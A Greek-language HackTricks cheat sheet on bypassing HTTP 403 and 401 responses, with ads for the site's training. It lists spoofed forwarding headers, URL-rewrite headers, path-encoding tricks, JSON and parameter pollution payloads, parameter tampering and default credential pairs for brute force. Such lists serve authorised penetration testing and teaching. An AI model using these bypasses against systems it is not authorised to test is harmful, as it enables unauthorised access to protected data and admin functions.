403 & 401 Bypasses

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Άμεσα διαθέσιμη εγκατάσταση για αξιολόγηση ευπαθειών & δοκιμές διείσδυσης. Εκτελέστε μια πλήρη δοκιμή διείσδυσης από οπουδήποτε με 20+ εργαλεία & χαρακτηριστικά που καλύπτουν από την αναγνώριση μέχρι την αναφορά. Δεν αντικαθιστούμε τους δοκιμαστές διείσδυσης - αναπτύσσουμε προσαρμοσμένα εργαλεία, ανίχνευση & εκμετάλλευση modules για να τους δώσουμε λίγο χρόνο να εξερευνήσουν βαθύτερα, να ανοίξουν κελιά και να διασκεδάσουν.

Αναζήτηση HTTP Ρητών/Μεθόδων

Δοκιμάστε να χρησιμοποιήσετε διαφορετικές ρήτρες για πρόσβαση στο αρχείο: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

  • Ελέγξτε τις κεφαλίδες απάντησης, ίσως δοθεί κάποια πληροφορία. Για παράδειγμα, μια απάντηση 200 σε HEAD με Content-Length: 55 σημαίνει ότι η ρήτρα HEAD μπορεί να έχει πρόσβαση στις πληροφορίες. Αλλά πρέπει ακόμα να βρείτε έναν τρόπο να εξαγάγετε αυτές τις πληροφορίες.

  • Χρησιμοποιώντας μια κεφαλίδα HTTP όπως X-HTTP-Method-Override: PUT μπορεί να αντικαταστήσει τη ρήτρα που χρησιμοποιήθηκε.

  • Χρησιμοποιήστε τη ρήτρα TRACE και αν έχετε πολύ τύχη ίσως στην απάντηση δείτε επίσης τις κεφαλίδες που προστέθηκαν από ενδιάμεσους διακομιστές που μπορεί να είναι χρήσιμες.

Αναζήτηση Κεφαλίδων HTTP

  • Αλλάξτε την κεφαλίδα Host σε κάποια αυθαίρετη τιμή (που δούλεψε εδώ)

  • Δοκιμάστε να χρησιμοποιήσετε άλλους User Agents για πρόσβαση στον πόρο.

  • Αναζήτηση Κεφαλίδων HTTP: Δοκιμάστε να χρησιμοποιήσετε Κεφαλίδες HTTP Proxy, Βασική Αυθεντικοποίηση HTTP και NTLM brute-force (με λίγους συνδυασμούς μόνο) και άλλες τεχνικές. Για όλα αυτά έχω δημιουργήσει το εργαλείο fuzzhttpbypass.

  • X-Originating-IP: 127.0.0.1

  • X-Forwarded-For: 127.0.0.1

  • X-Forwarded: 127.0.0.1

  • Forwarded-For: 127.0.0.1

  • X-Remote-IP: 127.0.0.1

  • X-Remote-Addr: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • X-Original-URL: 127.0.0.1

  • Client-IP: 127.0.0.1

  • True-Client-IP: 127.0.0.1

  • Cluster-Client-IP: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • Host: localhost

Αν η διαδρομή είναι προστατευμένη μπορείτε να δοκιμάσετε να παρακάμψετε την προστασία της διαδρομής χρησιμοποιώντας αυτές τις άλλες κεφαλίδες:

  • X-Original-URL: /admin/console

  • X-Rewrite-URL: /admin/console

  • Αν η σελίδα είναι πίσω από έναν διακομιστή proxy, ίσως είναι ο proxy αυτός που σας εμποδίζει να έχετε πρόσβαση στις ιδιωτικές πληροφορίες. Δοκιμάστε να καταχραστείτε το HTTP Request Smuggling ή κεφαλίδες hop-by-hop.

  • Αναζητήστε ειδικές κεφαλίδες HTTP ψάχνοντας για διαφορετική απάντηση.

  • Αναζητήστε ειδικές κεφαλίδες HTTP ενώ αναζητάτε Μέθοδους HTTP.

  • Αφαιρέστε την κεφαλίδα Host και ίσως να μπορέσετε να παρακάμψετε την προστασία.

Αναζήτηση Διαδρομών

Αν /path είναι μπλοκαρισμένο:

  • Δοκιμάστε να χρησιμοποιήσετε /%2e/path _(αν η πρόσβαση είναι μπλοκαρισμένη από έναν διακομιστή proxy, αυτό μπορεί να παρακάμψει την προστασία). Δοκιμάστε επίσης_** /%252e**/path (διπλή κωδικοποίηση URL)

  • Δοκιμάστε Παράκαμψη Unicode: /%ef%bc%8fpath (Οι κωδικοποιημένοι χαρακτήρες URL είναι σαν "/") οπότε όταν αποκωδικοποιηθούν θα είναι //path και ίσως έχετε ήδη παρακάμψει τον έλεγχο ονόματος /path

  • Άλλες παρακάμψεις διαδρομών:

  • site.com/secret –> HTTP 403 Forbidden

  • site.com/SECRET –> HTTP 200 OK

  • site.com/secret/ –> HTTP 200 OK

  • site.com/secret/. –> HTTP 200 OK

  • site.com//secret// –> HTTP 200 OK

  • site.com/./secret/.. –> HTTP 200 OK

  • site.com/;/secret –> HTTP 200 OK

  • site.com/.;/secret –> HTTP 200 OK

  • site.com//;//secret –> HTTP 200 OK

  • site.com/secret.json –> HTTP 200 OK (ruby)

  • Χρησιμοποιήστε όλη αυτή τη λίστα στις ακόλουθες καταστάσεις:

  • /FUZZsecret

  • /FUZZ/secret

  • /secretFUZZ

  • Άλλες παρακάμψεις API:

  • /v3/users_data/1234 --> 403 Forbidden

  • /v1/users_data/1234 --> 200 OK

  • {“id”:111} --> 401 Μη εξουσιοδοτημένο

  • {“id”:[111]} --> 200 OK

  • {“id”:111} --> 401 Μη εξουσιοδοτημένο

  • {“id”:{“id”:111}} --> 200 OK

  • {"user_id":"<legit_id>","user_id":"<victims_id>"} (Ρύπανση Παραμέτρων JSON)

  • user_id=ATTACKER_ID&user_id=VICTIM_ID (Ρύπανση Παραμέτρων)

Αλλαγή Παραμέτρου

  • Αλλαγή τιμής παραμέτρου: Από id=123 --> id=124

  • Προσθήκη επιπλέον παραμέτρων στο URL: ?id=124 —-> id=124&isAdmin=true

  • Αφαίρεση των παραμέτρων

  • Αναδιάταξη των παραμέτρων

  • Χρήση ειδικών χαρακτήρων.

  • Εκτέλεση δοκιμών ορίων στις παραμέτρους — παρέχοντας τιμές όπως -234 ή 0 ή 99999999 (μόνο μερικές παραδειγματικές τιμές).

Έκδοση Πρωτοκόλλου

Εάν χρησιμοποιείτε HTTP/1.1 δοκιμάστε να χρησιμοποιήσετε το 1.0 ή ακόμα να ελέγξετε αν υποστηρίζει το 2.0.

Άλλες Παρακάμψεις

  • Λάβετε την IP ή το CNAME του domain και δοκιμάστε να επικοινωνήσετε μαζί του απευθείας.

  • Δοκιμάστε να επιβαρύνετε τον διακομιστή στέλνοντας συνήθεις αιτήσεις GET (Λειτούργησε για αυτόν τον τύπο με το Facebook).

  • Αλλαγή του πρωτοκόλλου: από http σε https, ή από https σε http

  • Πηγαίνετε στο https://archive.org/web/ και ελέγξτε αν στο παρελθόν αυτό το αρχείο ήταν παγκοσμίως προσβάσιμο.

Επίθεση Βίας

  • Μαντέψτε τον κωδικό πρόσβασης: Δοκιμάστε τα ακόλουθα συνηθισμένα διαπιστευτήρια. Γνωρίζετε κάτι για το θύμα; Ή το όνομα της πρόκλησης CTF;

  • Επίθεση βίας: Δοκιμάστε βασική, digest και NTLM πιστοποίηση.

Συνηθισμένα διαπιστευτήρια
admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

Αυτόματα Εργαλεία

Άμεση διαθεσιμότητα εγκατάστασης για αξιολόγηση ευπαθειών & δοκιμές διείσδυσης. Εκτελέστε μια πλήρη δοκιμή διείσδυσης από οπουδήποτε με 20+ εργαλεία & χαρακτηριστικά που καλύπτουν από την αναγνώριση μέχρι την αναφορά. Δεν αντικαθιστούμε τους δοκιμαστές διείσδυσης - αναπτύσσουμε προσαρμοσμένα εργαλεία, ανίχνευση & εκμετάλλευση modules για να τους δώσουμε πίσω χρόνο για να εξερευνήσουν βαθύτερα, να ανοίξουν κελιά και να διασκεδάσουν.

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Last updated